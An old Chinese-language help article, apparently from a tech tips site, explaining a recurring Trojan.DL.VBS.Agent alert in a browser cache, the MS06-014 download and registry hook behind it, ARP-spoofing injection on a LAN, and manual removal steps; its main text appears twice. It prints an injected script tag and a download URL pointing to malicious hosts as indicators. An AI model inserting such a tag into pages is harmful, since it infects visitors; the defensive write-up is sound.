Trojan.DL.VBS.Agent.cpb(k[1].js)腳本病毒的解決方法
更新時(shí)間:2007年06月09日 00:00:00 作者:
腳本病毒:Trojan.DL.VBS.Agent.cpb (文件名為k[1].js)老是在internet臨時(shí)文件里出現(xiàn),瑞星監(jiān)控殺了又來(lái),如此反復(fù)著!我試圖清空臨時(shí)文件,但一上網(wǎng)打開(kāi)網(wǎng)頁(yè)(不管是哪些網(wǎng)頁(yè)),那個(gè)k[1].js又會(huì)被瑞星監(jiān)控到。這是怎么回事呀?是誤報(bào)嗎?
該網(wǎng)頁(yè)利用MS06-014漏洞,下載http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll,并直接寫(xiě)入注冊(cè)表
Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}指向C:\WINDOWS\winhelp.dll
由于瑞星查殺了k.js,一般情況下大家是不會(huì)中毒的。但是之所以重復(fù)出現(xiàn)k.js的報(bào)毒,原因是:
局域網(wǎng)中有電腦中了此毒,然后向局域網(wǎng)中其他電腦發(fā)動(dòng)ARP攻擊,將其他用戶接收到的網(wǎng)絡(luò)數(shù)據(jù)包中加入
Code:
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代碼,導(dǎo)致其他用戶訪問(wèn)任何網(wǎng)站時(shí)都會(huì)報(bào)毒。
所以,首先,確認(rèn)你的電腦是否中毒:
確認(rèn)以下注冊(cè)表路徑是否存在:
Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在,嘗試在安全模式下刪除這兩個(gè)注冊(cè)表路徑。
如果不存在,說(shuō)明不是你本機(jī)的中毒問(wèn)題,而是你受到ARP攻擊的緣故。
這種情況下,請(qǐng)聯(lián)系局域網(wǎng)網(wǎng)管進(jìn)行協(xié)調(diào)處理。必須找到中毒并進(jìn)行ARP欺騙的電腦,然后將其斷網(wǎng)查毒。
該網(wǎng)頁(yè)利用MS06-014漏洞,下載http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll,并直接寫(xiě)入注冊(cè)表
Code:
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}指向C:\WINDOWS\winhelp.dll
由于瑞星查殺了k.js,一般情況下大家是不會(huì)中毒的。但是之所以重復(fù)出現(xiàn)k.js的報(bào)毒,原因是:
局域網(wǎng)中有電腦中了此毒,然后向局域網(wǎng)中其他電腦發(fā)動(dòng)ARP攻擊,將其他用戶接收到的網(wǎng)絡(luò)數(shù)據(jù)包中加入
Code:
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代碼,導(dǎo)致其他用戶訪問(wèn)任何網(wǎng)站時(shí)都會(huì)報(bào)毒。
所以,首先,確認(rèn)你的電腦是否中毒:
確認(rèn)以下注冊(cè)表路徑是否存在:
Code:
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在,嘗試在安全模式下刪除這兩個(gè)注冊(cè)表路徑。
如果不存在,說(shuō)明不是你本機(jī)的中毒問(wèn)題,而是你受到ARP攻擊的緣故。
這種情況下,請(qǐng)聯(lián)系局域網(wǎng)網(wǎng)管進(jìn)行協(xié)調(diào)處理。必須找到中毒并進(jìn)行ARP欺騙的電腦,然后將其斷網(wǎng)查毒。
相關(guān)文章
diskregerl.exe(Trojan.Agent.cdt)病毒手動(dòng)查殺
文件名稱(chēng):diskregerl.exe 文件大?。?5,056 字節(jié) AV命名:Trojan.Agent.cdt 加殼方式:UPX 編寫(xiě)語(yǔ)言:VC2008-04-04
各分區(qū)根目錄釋放shell.exe,autorun.inf 的病毒清除方法
各分區(qū)根目錄釋放shell.exe,autorun.inf 的病毒清除方法...2007-07-07
webpageparser.dll丟失問(wèn)題的解決方法
webpageparser.dll丟失問(wèn)題的解決方法...2007-03-03
md9.exe scvhost.exe 只木馬下載者查殺方法
md9.exe scvhost.exe 只木馬下載者查殺方法...2007-08-08
Autorun隨機(jī)7位字母命名的病毒專(zhuān)殺工具
Autorun隨機(jī)7位字母命名的病毒專(zhuān)殺工具...2007-06-06
“燈泡男”“神奇小子”(Win32.WizardBoy.a)病毒完整解決方案
“燈泡男”“神奇小子”(Win32.WizardBoy.a)病毒完整解決方案...2007-02-02
比較徹底的解決方法無(wú)法顯示隱藏文件夾"修改過(guò)注冊(cè)表也無(wú)效"的解決方法
今天新裝了XP SP2系統(tǒng),原來(lái)其它盤(pán)里的隱藏文件和文件夾全部無(wú)法顯示!2007-08-08

